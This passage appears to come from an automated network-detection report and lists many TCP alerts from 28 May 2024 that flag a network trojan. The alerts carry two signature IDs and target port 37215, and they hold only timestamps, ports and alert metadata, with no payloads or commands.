          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480911
          SID:2835222
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919080
          SID:2835222
          Source Port:52536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550369
          SID:2835222
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.625099
          SID:2835222
          Source Port:59414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890752
          SID:2829579
          Source Port:42726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484166
          SID:2829579
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741679
          SID:2835222
          Source Port:43352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721988
          SID:2829579
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725176
          SID:2829579
          Source Port:48390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075521
          SID:2829579
          Source Port:47340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125863
          SID:2835222
          Source Port:48742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729137
          SID:2835222
          Source Port:53980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299493
          SID:2829579
          Source Port:36364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157464
          SID:2829579
          Source Port:56558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298847
          SID:2829579
          Source Port:42160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466616
          SID:2829579
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989716
          SID:2829579
          Source Port:49340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815776
          SID:2829579
          Source Port:36334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272747
          SID:2829579
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471171
          SID:2829579
          Source Port:48550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117006
          SID:2829579
          Source Port:47388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238166
          SID:2829579
          Source Port:35742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976551
          SID:2829579
          Source Port:50444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160059
          SID:2835222
          Source Port:38764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201529
          SID:2835222
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301377
          SID:2835222
          Source Port:49996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138061
          SID:2829579
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249369
          SID:2829579
          Source Port:57008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230117
          SID:2829579
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235689
          SID:2835222
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557626
          SID:2835222
          Source Port:46582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843354
          SID:2829579
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487550
          SID:2829579
          Source Port:46130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743674
          SID:2835222
          Source Port:59444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400628
          SID:2829579
          Source Port:51938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951912
          SID:2835222
          Source Port:51400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989509
          SID:2829579
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636309
          SID:2829579
          Source Port:51750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216556
          SID:2829579
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154685
          SID:2829579
          Source Port:53130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764085
          SID:2835222
          Source Port:41568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462916
          SID:2829579
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547719
          SID:2829579
          Source Port:43400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066207
          SID:2829579
          Source Port:42960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466398
          SID:2829579
          Source Port:48982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536684
          SID:2835222
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681142
          SID:2829579
          Source Port:60044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767077
          SID:2835222
          Source Port:54076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243753
          SID:2835222
          Source Port:59650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893554
          SID:2835222
          Source Port:42236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.132900
          SID:2829579
          Source Port:52544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177995
          SID:2835222
          Source Port:48840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472463
          SID:2829579
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336697
          SID:2835222
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485372
          SID:2835222
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102788
          SID:2835222
          Source Port:54192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464316
          SID:2835222
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980288
          SID:2829579
          Source Port:58660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331551
          SID:2835222
          Source Port:59620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493002
          SID:2829579
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868082
          SID:2829579
          Source Port:49246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943957
          SID:2829579
          Source Port:48422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064236
          SID:2829579
          Source Port:36672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813346
          SID:2835222
          Source Port:48142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230315
          SID:2829579
          Source Port:60732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975307
          SID:2829579
          Source Port:52488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973171
          SID:2829579
          Source Port:33268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084777
          SID:2829579
          Source Port:53742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656300
          SID:2829579
          Source Port:58272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863293
          SID:2829579
          Source Port:50196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197765
          SID:2829579
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328742
          SID:2835222
          Source Port:55918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.801868
          SID:2829579
          Source Port:58606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812919
          SID:2835222
          Source Port:45516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328929
          SID:2829579
          Source Port:33966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464457
          SID:2829579
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815671
          SID:2835222
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113239
          SID:2835222
          Source Port:41314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594966
          SID:2829579
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372054
          SID:2835222
          Source Port:44524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.345809
          SID:2835222
          Source Port:56576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464285
          SID:2829579
          Source Port:47726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151485
          SID:2835222
          Source Port:34344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592782
          SID:2835222
          Source Port:48356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191855
          SID:2835222
          Source Port:34028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228510
          SID:2835222
          Source Port:57118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809309
          SID:2835222
          Source Port:55402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840572
          SID:2829579
          Source Port:51684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464407
          SID:2835222
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816820
          SID:2829579
          Source Port:54526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113030
          SID:2835222
          Source Port:44024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2835222
          Source Port:39448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848347
          SID:2829579
          Source Port:55774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215211
          SID:2835222
          Source Port:55884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152195
          SID:2829579
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239977
          SID:2835222
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924213
          SID:2829579
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959294
          SID:2829579
          Source Port:39256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774502
          SID:2835222
          Source Port:55846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272276
          SID:2829579
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267680
          SID:2829579
          Source Port:38260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542256
          SID:2829579
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269177
          SID:2829579
          Source Port:54088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993727
          SID:2829579
          Source Port:39232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183645
          SID:2835222
          Source Port:56016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729512
          SID:2829579
          Source Port:41334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628789
          SID:2829579
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941371
          SID:2835222
          Source Port:38268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527906
          SID:2835222
          Source Port:50046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652891
          SID:2829579
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272797
          SID:2829579
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537426
          SID:2835222
          Source Port:60188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.990407
          SID:2829579
          Source Port:45948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760607
          SID:2835222
          Source Port:32950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228450
          SID:2829579
          Source Port:36556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415929
          SID:2835222
          Source Port:43360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958846
          SID:2835222
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223289
          SID:2835222
          Source Port:55636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543469
          SID:2835222
          Source Port:34416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415810
          SID:2835222
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849286
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361391
          SID:2829579
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.065053
          SID:2835222
          Source Port:52640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125779
          SID:2829579
          Source Port:49698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186186
          SID:2835222
          Source Port:46192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963762
          SID:2829579
          Source Port:59666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336679
          SID:2829579
          Source Port:45710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497808
          SID:2835222
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853303
          SID:2835222
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668745
          SID:2829579
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949666
          SID:2835222
          Source Port:56386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339516
          SID:2835222
          Source Port:60038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301250
          SID:2829579
          Source Port:41452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501363
          SID:2835222
          Source Port:54476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000749
          SID:2829579
          Source Port:53554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847676
          SID:2829579
          Source Port:35860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474543
          SID:2835222
          Source Port:56080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551032
          SID:2835222
          Source Port:43834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230483
          SID:2835222
          Source Port:46634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671449
          SID:2835222
          Source Port:42234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113220
          SID:2835222
          Source Port:58954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336992
          SID:2829579
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818068
          SID:2829579
          Source Port:39162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548552
          SID:2835222
          Source Port:43222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207153
          SID:2835222
          Source Port:48580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485472
          SID:2829579
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476505
          SID:2835222
          Source Port:38588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665660
          SID:2835222
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809862
          SID:2829579
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126692
          SID:2835222
          Source Port:44414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221538
          SID:2829579
          Source Port:57388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156884
          SID:2835222
          Source Port:39390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838787
          SID:2829579
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.952049
          SID:2829579
          Source Port:38500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733385
          SID:2829579
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927634
          SID:2835222
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665160
          SID:2829579
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.077172
          SID:2835222
          Source Port:46236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267611
          SID:2829579
          Source Port:42352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.288143
          SID:2835222
          Source Port:43208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891874
          SID:2835222
          Source Port:39866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738450
          SID:2829579
          Source Port:50952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321094
          SID:2829579
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803354
          SID:2835222
          Source Port:38640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305635
          SID:2829579
          Source Port:59448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664301
          SID:2829579
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671644
          SID:2835222
          Source Port:57092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680361
          SID:2829579
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755998
          SID:2829579
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592966
          SID:2835222
          Source Port:57236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806420
          SID:2835222
          Source Port:48210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763732
          SID:2835222
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892843
          SID:2829579
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877505
          SID:2829579
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068579
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991099
          SID:2829579
          Source Port:49204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474634
          SID:2829579
          Source Port:45526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223650
          SID:2829579
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855517
          SID:2829579
          Source Port:58574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667808
          SID:2829579
          Source Port:34918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977334
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728907
          SID:2835222
          Source Port:34952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272020
          SID:2829579
          Source Port:56616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496763
          SID:2835222
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797874
          SID:2835222
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140102
          SID:2835222
          Source Port:35974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273432
          SID:2835222
          Source Port:45784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209120
          SID:2829579
          Source Port:54722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962848
          SID:2835222
          Source Port:36352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112946
          SID:2829579
          Source Port:37104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551095
          SID:2835222
          Source Port:46806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317269
          SID:2835222
          Source Port:52262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537737
          SID:2835222
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416038
          SID:2835222
          Source Port:32924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485007
          SID:2835222
          Source Port:59074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736569
          SID:2835222
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806229
          SID:2835222
          Source Port:38496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
